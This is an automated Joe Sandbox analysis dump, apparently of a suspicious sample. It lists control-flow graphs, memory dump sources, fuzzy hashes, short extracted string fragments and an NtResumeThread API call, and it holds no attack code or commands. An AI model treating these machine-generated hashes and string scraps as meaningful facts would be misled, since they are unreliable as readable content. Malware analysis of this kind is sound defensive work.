                                                                                  control_flow_graph 1380 7173798-71737b9 1381 71737c0-71738a7 1380->1381 1382 71737bb 1380->1382 1384 71738ad-71739ee 1381->1384 1385 7173fa9-7173fd1 1381->1385 1382->1381 1429 71739f4-7173a4f 1384->1429 1430 7173f72-7173f9c 1384->1430 1388 71746d7-71746e0 1385->1388 1390 71746e6-71746fd 1388->1390 1391 7173fdf-7173fe9 1388->1391 1392 7173ff0-71740e4 1391->1392 1393 7173feb 1391->1393 1412 71740e6-71740f2 1392->1412 1413 717410e 1392->1413 1393->1392 1415 71740f4-71740fa 1412->1415 1416 71740fc-7174102 1412->1416 1414 7174114-7174134 1413->1414 1420 7174136-717418f 1414->1420 1421 7174194-7174214 1414->1421 1418 717410c 1415->1418 1416->1418 1418->1414 1435 71746d4 1420->1435 1443 7174216-7174269 1421->1443 1444 717426b-71742ae 1421->1444 1437 7173a54-7173a5f 1429->1437 1438 7173a51 1429->1438 1440 7173fa6 1430->1440 1441 7173f9e 1430->1441 1435->1388 1442 7173e87-7173e8d 1437->1442 1438->1437 1440->1385 1441->1440 1445 7173a64-7173a82 1442->1445 1446 7173e93-7173f0f 1442->1446 1466 71742b9-71742c2 1443->1466 1444->1466 1447 7173a84-7173a88 1445->1447 1448 7173ad9-7173aee 1445->1448 1486 7173f5c-7173f62 1446->1486 1447->1448 1453 7173a8a-7173a95 1447->1453 1451 7173af5-7173b0b 1448->1451 1452 7173af0 1448->1452 1456 7173b12-7173b29 1451->1456 1457 7173b0d 1451->1457 1452->1451 1458 7173acb-7173ad1 1453->1458 1460 7173b30-7173b46 1456->1460 1461 7173b2b 1456->1461 1457->1456 1462 7173a97-7173a9b 1458->1462 1463 7173ad3-7173ad4 1458->1463 1469 7173b4d-7173b54 1460->1469 1470 7173b48 1460->1470 1461->1460 1467 7173aa1-7173ab9 1462->1467 1468 7173a9d 1462->1468 1465 7173b57-7173bc2 1463->1465 1476 7173bd6-7173d8b 1465->1476 1477 7173bc4-7173bd0 1465->1477 1473 7174322-7174331 1466->1473 1474 7173ac0-7173ac8 1467->1474 1475 7173abb 1467->1475 1468->1467 1469->1465 1470->1469 1478 71742c4-71742ec 1473->1478 1479 7174333-71743bb 1473->1479 1474->1458 1475->1474 1484 7173def-7173e04 1476->1484 1485 7173d8d-7173d91 1476->1485 1477->1476 1482 71742f3-717431c 1478->1482 1483 71742ee 1478->1483 1514 7174534-7174540 1479->1514 1482->1473 1483->1482 1492 7173e06 1484->1492 1493 7173e0b-7173e2c 1484->1493 1485->1484 1488 7173d93-7173da2 1485->1488 1490 7173f64-7173f6a 1486->1490 1491 7173f11-7173f59 1486->1491 1497 7173de1-7173de7 1488->1497 1490->1430 1491->1486 1492->1493 1494 7173e33-7173e52 1493->1494 1495 7173e2e 1493->1495 1498 7173e54 1494->1498 1499 7173e59-7173e79 1494->1499 1495->1494 1501 7173da4-7173da8 1497->1501 1502 7173de9-7173dea 1497->1502 1498->1499 1507 7173e80 1499->1507 1508 7173e7b 1499->1508 1505 7173db2-7173dd3 1501->1505 1506 7173daa-7173dae 1501->1506 1509 7173e84 1502->1509 1510 7173dd5 1505->1510 1511 7173dda-7173dde 1505->1511 1506->1505 1507->1509 1508->1507 1509->1442 1510->1511 1511->1497 1516 7174546-71745a1 1514->1516 1517 71743c0-71743c9 1514->1517 1532 71745a3-71745d6 1516->1532 1533 71745d8-7174602 1516->1533 1518 71743d2-7174528 1517->1518 1519 71743cb 1517->1519 1534 717452e 1518->1534 1519->1518 1521 71744a7-71744e7 1519->1521 1522 7174462-71744a2 1519->1522 1523 717441d-717445d 1519->1523 1524 71743d8-7174418 1519->1524 1521->1534 1522->1534 1523->1534 1524->1534 1541 717460b-717469e 1532->1541 1533->1541 1534->1514 1545 71746a5-71746c5 1541->1545 1545->1435
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TJpq$Tekq$poq$xbnq$BE
                                                                                  • API String ID: 0-2293240419
                                                                                  • Opcode ID: 5a3c70929e1cd2495c850dd8875cb748fd0120a3bb11b1404a5d528341ce592b
                                                                                  • Instruction ID: 88676bfd7f8646b1f4d7caeb29de6629e1fe89edab5b006d52aefbd277084d9a
                                                                                  • Opcode Fuzzy Hash: 5a3c70929e1cd2495c850dd8875cb748fd0120a3bb11b1404a5d528341ce592b
                                                                                  • Instruction Fuzzy Hash: C5A2B875A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1926 7174e48-7174e74 1929 7174e76-7174ea6 1926->1929 1930 7174e0c-7174e28 1926->1930 1931 7174ead-7174fcf 1929->1931 1932 7174ea8 1929->1932 1933 7174dba-7174dc1 1930->1933 1934 7174e2a-7174e2f 1930->1934 1940 7174ff3-7174fff 1931->1940 1941 7174fd1-7174fe7 1931->1941 1932->1931 1933->1930 1942 7175006-717500b 1940->1942 1943 7175001 1940->1943 2218 7174fed call 7177a08 1941->2218 2219 7174fed call 71779f8 1941->2219 1944 7175043-717508c 1942->1944 1945 717500d-7175019 1942->1945 1943->1942 1955 7175093-7175358 1944->1955 1956 717508e 1944->1956 1947 7175020-717503e 1945->1947 1948 717501b 1945->1948 1949 71767a7-71767ad 1947->1949 1948->1947 1951 71767af-71767cf 1949->1951 1952 71767d8 1949->1952 1951->1952 1981 7175d88-7175d94 1955->1981 1956->1955 1982 717535d-7175369 1981->1982 1983 7175d9a-7175dd2 1981->1983 1984 7175370-71753c8 1982->1984 1985 717536b 1982->1985 1992 7175eac-7175eb2 1983->1992 1995 71753d4-7175495 1984->1995 1985->1984 1993 7175dd7-7175e54 1992->1993 1994 7175eb8-7175ef0 1992->1994 2009 7175e87-7175ea9 1993->2009 2010 7175e56-7175e5a 1993->2010 2004 717624e-7176254 1994->2004 2020 7175497-71754cf 1995->2020 2021 71754d5-717555e 1995->2021 2007 7175ef5-71760f7 2004->2007 2008 717625a-71762a2 2004->2008 2101 7176196-717619a 2007->2101 2102 71760fd-7176191 2007->2102 2017 71762a4-7176317 2008->2017 2018 717631d-7176368 2008->2018 2009->1992 2010->2009 2013 7175e5c-7175e84 2010->2013 2013->2009 2017->2018 2038 7176771-7176777 2018->2038 2020->2021 2048 7175560-7175568 2021->2048 2049 717556d-71755f1 2021->2049 2041 717636d-71763ef 2038->2041 2042 717677d-71767a5 2038->2042 2061 7176417-7176423 2041->2061 2062 71763f1-717640c 2041->2062 2042->1949 2051 7175d79-7175d85 2048->2051 2074 71755f3-71755fb 2049->2074 2075 7175600-7175684 2049->2075 2051->1981 2063 7176425 2061->2063 2064 717642a-7176436 2061->2064 2062->2061 2063->2064 2066 7176449-7176458 2064->2066 2067 7176438-7176444 2064->2067 2072 7176461-7176739 2066->2072 2073 717645a 2066->2073 2071 7176758-717676e 2067->2071 2071->2038 2107 7176744-7176750 2072->2107 2073->2072 2076 7176467-71764d0 2073->2076 2077 71764d5-717654d 2073->2077 2078 7176552-71765bb 2073->2078 2079 71765c0-7176629 2073->2079 2080 717662e-7176696 2073->2080 2074->2051 2126 7175686-717568e 2075->2126 2127 7175693-7175717 2075->2127 2076->2107 2077->2107 2078->2107 2079->2107 2113 717670a-7176710 2080->2113 2109 71761f7-7176234 2101->2109 2110 717619c-71761f5 2101->2110 2124 7176235-717624b 2102->2124 2107->2071 2109->2124 2110->2124 2115 7176712-717671c 2113->2115 2116 7176698-71766f6 2113->2116 2115->2107 2132 71766fd-7176707 2116->2132 2133 71766f8 2116->2133 2124->2004 2126->2051 2139 7175726-71757aa 2127->2139 2140 7175719-7175721 2127->2140 2132->2113 2133->2132 2146 71757ac-71757b4 2139->2146 2147 71757b9-717583d 2139->2147 2140->2051 2146->2051 2153 717583f-7175847 2147->2153 2154 717584c-71758d0 2147->2154 2153->2051 2160 71758d2-71758da 2154->2160 2161 71758df-7175963 2154->2161 2160->2051 2167 7175965-717596d 2161->2167 2168 7175972-71759f6 2161->2168 2167->2051 2174 7175a05-7175a89 2168->2174 2175 71759f8-7175a00 2168->2175 2181 7175a8b-7175a93 2174->2181 2182 7175a98-7175b1c 2174->2182 2175->2051 2181->2051 2188 7175b1e-7175b26 2182->2188 2189 7175b2b-7175baf 2182->2189 2188->2051 2195 7175bb1-7175bb9 2189->2195 2196 7175bbe-7175c42 2189->2196 2195->2051 2202 7175c44-7175c4c 2196->2202 2203 7175c51-7175cd5 2196->2203 2202->2051 2209 7175cd7-7175cdf 2203->2209 2210 7175ce4-7175d68 2203->2210 2209->2051 2216 7175d74-7175d76 2210->2216 2217 7175d6a-7175d72 2210->2217 2216->2051 2217->2051 2218->1940 2219->1940
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 2$$kq
                                                                                  • API String ID: 0-2649369545
                                                                                  • Opcode ID: 0130f1dd3d723af7d12db1f555e7e0cffa49d0bbace0acf9a28f7070002383ca
                                                                                  • Instruction ID: 3c13a30258df1ff362f0c13dff1f9b6c792e5ae4379e384d56303ee210479289
                                                                                  • Opcode Fuzzy Hash: 0130f1dd3d723af7d12db1f555e7e0cffa49d0bbace0acf9a28f7070002383ca
                                                                                  • Instruction Fuzzy Hash: E7E2F6B8E052288FCB65DF69D9946D9BBF2FB89304F1082E9D409A7354DB349E81CF50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2245 74bb0f0-74bb111 2246 74bb118-74bb192 call 74b5678 call 74bbb98 2245->2246 2247 74bb113 2245->2247 2252 74bb198-74bb1d5 2246->2252 2247->2246 2254 74bb1d7-74bb1e2 2252->2254 2255 74bb1e4 2252->2255 2256 74bb1ee-74bb309 2254->2256 2255->2256 2267 74bb31b-74bb346 2256->2267 2268 74bb30b-74bb311 2256->2268 2269 74bbb00-74bbb1c 2267->2269 2268->2267 2270 74bb34b-74bb4ae call 74ba110 2269->2270 2271 74bbb22-74bbb3d 2269->2271 2282 74bb4c0-74bb64f call 74b7c50 call 74b3ee8 2270->2282 2283 74bb4b0-74bb4b6 2270->2283 2295 74bb651-74bb655 2282->2295 2296 74bb6b4-74bb6bb 2282->2296 2283->2282 2297 74bb65d-74bb6af 2295->2297 2298 74bb657-74bb658 2295->2298 2299 74bb8d9-74bb8f5 2296->2299 2300 74bb97b-74bb9e6 2297->2300 2298->2300 2301 74bb8fb-74bb925 2299->2301 2302 74bb6c0-74bb803 call 74ba110 2299->2302 2319 74bb9f8-74bba43 2300->2319 2320 74bb9e8-74bb9ee 2300->2320 2308 74bb978-74bb979 2301->2308 2309 74bb927-74bb975 2301->2309 2331 74bb809-74bb8d2 call 74ba110 2302->2331 2332 74bb8d5-74bb8d6 2302->2332 2308->2300 2309->2308 2321 74bba49-74bbae1 2319->2321 2322 74bbae2-74bbafd 2319->2322 2320->2319 2321->2322 2322->2269 2331->2332 2332->2299
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fpq$8
                                                                                  • API String ID: 0-1207623099
                                                                                  • Opcode ID: 4531011ee53e05f504b15b3c9d9ca4b6ad3dc7d4cd514fdddda23cab6acbdcfa
                                                                                  • Instruction ID: 3892fad3e102586863d81e8d6502be5edd6b6d9aa0c06ff282606bc76b254ceb
                                                                                  • Opcode Fuzzy Hash: 4531011ee53e05f504b15b3c9d9ca4b6ad3dc7d4cd514fdddda23cab6acbdcfa
                                                                                  • Instruction Fuzzy Hash: F852B7B5D01629CFDB64DF69C890AD9B7B1FF89310F1086AAD809A7354DB316E81CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fpq$h
                                                                                  • API String ID: 0-747736143
                                                                                  • Opcode ID: c15fa563c7032e163df38448894f2092e1158851313caf507530e15f1142131c
                                                                                  • Instruction ID: 05ca4e972054d4ec821afd90c4a0fb1486560197c5fddb522ce3a6a59bfc90a9
                                                                                  • Opcode Fuzzy Hash: c15fa563c7032e163df38448894f2092e1158851313caf507530e15f1142131c
                                                                                  • Instruction Fuzzy Hash: 617109B5D016288BDB64DF69C850AD9B7B2FF89300F5082AAD40DB7254DB305E85CF61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: 9111021a858a7c4ba1cf24054b306c15850e42609542a1eb0e120010648e0978
                                                                                  • Instruction ID: e83dd9327c0bfad063cde9c8defcc8c7084de07087c9467827fc0548ce7d9ff1
                                                                                  • Opcode Fuzzy Hash: 9111021a858a7c4ba1cf24054b306c15850e42609542a1eb0e120010648e0978
                                                                                  • Instruction Fuzzy Hash: 8D120AB4A09228CFDB68DF69C894B99B7F2FB89304F5081A9D40DA7394DB749D81CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PHkq
                                                                                  • API String ID: 0-902561536
                                                                                  • Opcode ID: 23ba8220b970a0da4195461c5fd403deb73657b4f83f47265e6392b97804d9f2
                                                                                  • Instruction ID: befb58f803a918394809c7caba4ea73a3f8d19fa9a6b10b664cbaa6c2b4c223b
                                                                                  • Opcode Fuzzy Hash: 23ba8220b970a0da4195461c5fd403deb73657b4f83f47265e6392b97804d9f2
                                                                                  • Instruction Fuzzy Hash: 83D106B4E04218CFDB28CFA9C484B9DB7F3FB8A304F5181A9D819A7294DB745995CF01
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PHkq
                                                                                  • API String ID: 0-902561536
                                                                                  • Opcode ID: 340b6ef77ea28bfd295d9cd192f01b274dfc1be0cad7f3ca2eedc3484aceabab
                                                                                  • Instruction ID: 6888ffe0313ff03d47d6eef11e9a7752126b829ab7b2dc85c44f1974207b29d6
                                                                                  • Opcode Fuzzy Hash: 340b6ef77ea28bfd295d9cd192f01b274dfc1be0cad7f3ca2eedc3484aceabab
                                                                                  • Instruction Fuzzy Hash: 98D106B4E04218CFDB68CFA9D484B9DBBF3FB89304F5081AAD819A7294DB745985CF41
                                                                                  APIs
                                                                                  • NtResumeThread.NTDLL(?,?), ref: 0715F076
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: c89aeacca34b37235534cb2cff7cacfa04d74abe6500642ff825e93d68849ce4
                                                                                  • Instruction ID: ac3974a0d3554ef5d149ee68b0c4be0fdf25c64f499924b90eb057d1f6543464
                                                                                  • Opcode Fuzzy Hash: c89aeacca34b37235534cb2cff7cacfa04d74abe6500642ff825e93d68849ce4
                                                                                  • Instruction Fuzzy Hash: EC1124B19002499ACB20DFAAC844B9FFFF8AF48220F14842AD459A7250CB75A945CFA4
                                                                                  APIs
                                                                                  • NtResumeThread.NTDLL(?,?), ref: 0715F076
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: d72c5938cd96ceabf4cdbe66ce6a4de7cc092fc3300a65155353b132afdbcb29
                                                                                  • Instruction ID: cfcee3ae651c462b3ef44b14fe2f50e1a5348744c367b0470916897fd8d60c8f
                                                                                  • Opcode Fuzzy Hash: d72c5938cd96ceabf4cdbe66ce6a4de7cc092fc3300a65155353b132afdbcb29
                                                                                  • Instruction Fuzzy Hash: 381114B1D002098FDB14DFAAC584B9FFBF8EF88320F14842AD459A7250CB74A944CFA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: 28d4ea3a90de9b4606016321393652118985273718cca89cee63008aeeeca032
                                                                                  • Instruction ID: 69bd3813a6bfaef06997336eea5cd7a2e9776e9053498f41117450e4c7e75a80
                                                                                  • Opcode Fuzzy Hash: 28d4ea3a90de9b4606016321393652118985273718cca89cee63008aeeeca032
                                                                                  • Instruction Fuzzy Hash: F0B1F4B4E01219CFDB18CFA9D985B9DBBF2BB4A304F2181A9D419B7395DB709985CF00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: 6248f3fdee3fbf848535605e9c74d0533baac3a41b88c218047d85972632d089
                                                                                  • Instruction ID: 107c1e5ec7570e65869851be1f262b045d954f6218c26ce5bde00dc7ad157ea3
                                                                                  • Opcode Fuzzy Hash: 6248f3fdee3fbf848535605e9c74d0533baac3a41b88c218047d85972632d089
                                                                                  • Instruction Fuzzy Hash: 7AB104B4E05219CFDB18CFA9D984B9DBBF2BB4A300F218169D429B7395D730A981CF00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: 4ea3cd22c6c5f1d745aac7148ec44dbd055c7dcc6b5f8863973cd1d7d912f618
                                                                                  • Instruction ID: c23a79cad6a85349bcd32605a76692a4c67c31f4d379d135b0858ef772a8b494
                                                                                  • Opcode Fuzzy Hash: 4ea3cd22c6c5f1d745aac7148ec44dbd055c7dcc6b5f8863973cd1d7d912f618
                                                                                  • Instruction Fuzzy Hash: C191F4B4E01219CFDB58CFA9D984B9DBBF2BB4A305F2181A9D419B7395D734A981CF00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054422216.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70a0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 63f243f2b4a87dbbf2b98905c3025b1676dbb7a0831b928b9c235e99a07e96bc
                                                                                  • Instruction ID: ff662e6ba68b94845d5170edb6a26586578d02b0461d6bbb269113664fb4fac3
                                                                                  • Opcode Fuzzy Hash: 63f243f2b4a87dbbf2b98905c3025b1676dbb7a0831b928b9c235e99a07e96bc
                                                                                  • Instruction Fuzzy Hash: 8422A9B0B01209AFDB19DBB9C550BAEB7F6AF89304F244569E146DB3A0CB75EC01CB51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7933652a69d8b88ae3af7118eebce9afc59b8dc465b0c3bee79e22f913cd9cdd
                                                                                  • Instruction ID: d5df1c1f3ee8632f6210e5789751613e9fa35a574c931020a6f087c0b0daac6e
                                                                                  • Opcode Fuzzy Hash: 7933652a69d8b88ae3af7118eebce9afc59b8dc465b0c3bee79e22f913cd9cdd
                                                                                  • Instruction Fuzzy Hash: 1352D3B4A006298FCB64DF28C994B9AB7F6FB89301F1092D9D44DA7355DB34AE81CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cea94547b0648e4e0062042dec2ef4db14254cd2da8ba837082a3432208f70f6
                                                                                  • Instruction ID: 5db4b855e036c0867c3297e939cbae6affe5e2e13605a59593ceeeb5537fa088
                                                                                  • Opcode Fuzzy Hash: cea94547b0648e4e0062042dec2ef4db14254cd2da8ba837082a3432208f70f6
                                                                                  • Instruction Fuzzy Hash: 03C1D1B4A05218CFDB24DFAAD544BDEBBF2FB89304F50926AD409AB244DB355C46CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 43c0a5e8a6b8d4fc4c846e815f04765cb78183d3d3cbb0be79ccfaae614e38d0
                                                                                  • Instruction ID: 2bb430257ce9e4596da30820261fdf6a62ea8dd5d5cdce5b598af43baa3aca04
                                                                                  • Opcode Fuzzy Hash: 43c0a5e8a6b8d4fc4c846e815f04765cb78183d3d3cbb0be79ccfaae614e38d0
                                                                                  • Instruction Fuzzy Hash: 3FC1C0B4A05218CFDB64DFAAD584BDDBBF2FB89304F50926AD409AB244DB356C46CF10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8846c962f51fe0eb90b9b303a613a6c2844f92869921b1ee28eb7f6c608a0737
                                                                                  • Instruction ID: 815ce59712309c53c55d5c2805dc25b2a2f24e762d94a84010da601c9a682acc
                                                                                  • Opcode Fuzzy Hash: 8846c962f51fe0eb90b9b303a613a6c2844f92869921b1ee28eb7f6c608a0737
                                                                                  • Instruction Fuzzy Hash: 2F9159B4E54218CFDB08DFA9D484BADBBF1FF8A304F509269D419A7294DB34A885CF40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1547 7435d48-7435d70 1549 7435d72-7435db9 1547->1549 1550 7435dbe-7435dcc 1547->1550 1599 7436215-743621c 1549->1599 1551 7435ddb 1550->1551 1552 7435dce-7435dd9 call 7433870 1550->1552 1554 7435ddd-7435de4 1551->1554 1552->1554 1557 7435dea-7435dee 1554->1557 1558 7435ecd-7435ed1 1554->1558 1562 7435df4-7435df8 1557->1562 1563 743621d-7436245 1557->1563 1560 7435ed3-7435ee2 call 7431a98 1558->1560 1561 7435f27-7435f31 1558->1561 1577 7435ee6-7435eeb 1560->1577 1566 7435f33-7435f42 call 7431248 1561->1566 1567 7435f6a-7435f90 1561->1567 1564 7435e0a-7435e68 call 74335b0 call 7434018 1562->1564 1565 7435dfa-7435e04 1562->1565 1569 743624c-7436276 1563->1569 1609 74362db-7436305 1564->1609 1610 7435e6e-7435ec8 1564->1610 1565->1564 1565->1569 1581 7435f48-7435f65 1566->1581 1582 743627e-7436294 1566->1582 1588 7435f92-7435f9b 1567->1588 1589 7435f9d 1567->1589 1569->1582 1583 7435ee4 1577->1583 1584 7435eed-7435f22 call 7435c18 1577->1584 1581->1599 1607 743629c-74362d4 1582->1607 1583->1577 1584->1599 1597 7435f9f-7435fc7 1588->1597 1589->1597 1613 7436098-743609c 1597->1613 1614 7435fcd-7435fe6 1597->1614 1607->1609 1619 7436307-743630d 1609->1619 1620 743630f-7436315 1609->1620 1610->1599 1617 7436116-7436120 1613->1617 1618 743609e-74360b7 1613->1618 1614->1613 1640 7435fec-7435ffb call 7431070 1614->1640 1622 7436122-743612c 1617->1622 1623 743617d-7436186 1617->1623 1618->1617 1645 74360b9-74360c8 call 7431070 1618->1645 1619->1620 1626 7436316-7436353 1619->1626 1638 7436132-7436144 1622->1638 1639 743612e-7436130 1622->1639 1628 7436188-74361b6 call 7432dc0 call 7432de0 1623->1628 1629 74361be-743620b 1623->1629 1628->1629 1651 7436213 1629->1651 1646 7436146-7436148 1638->1646 1639->1646 1661 7436013-7436028 1640->1661 1662 7435ffd-7436003 1640->1662 1669 74360e0-74360eb 1645->1669 1670 74360ca-74360d0 1645->1670 1649 7436176-743617b 1646->1649 1650 743614a-743614e 1646->1650 1649->1622 1649->1623 1657 7436150-7436169 1650->1657 1658 743616c-743616f 1650->1658 1651->1599 1657->1658 1658->1649 1667 743602a-7436056 call 7431f10 1661->1667 1668 743605c-7436065 1661->1668 1663 7436007-7436009 1662->1663 1664 7436005 1662->1664 1663->1661 1664->1661 1667->1607 1667->1668 1668->1609 1675 743606b-7436092 1668->1675 1669->1609 1671 74360f1-7436114 1669->1671 1676 74360d2 1670->1676 1677 74360d4-74360d6 1670->1677 1671->1617 1671->1645 1675->1613 1675->1640 1676->1669 1677->1669
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Hoq$Hoq$Hoq
                                                                                  • API String ID: 0-3310881576
                                                                                  • Opcode ID: 66089e82b0045277d4a87eaf1351d6c474e5b3793fc1553dbf01fac9f23151ce
                                                                                  • Instruction ID: 11f829d94fc3ad21d823619d2507ea3045a76a7e05f01d4141b5b14878fe5688
                                                                                  • Opcode Fuzzy Hash: 66089e82b0045277d4a87eaf1351d6c474e5b3793fc1553dbf01fac9f23151ce
                                                                                  • Instruction Fuzzy Hash: 17125EB0A00206DFCB24DFA9C594AAEB7B2FF88300F15852DD44A9B795DB35EC46CB51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
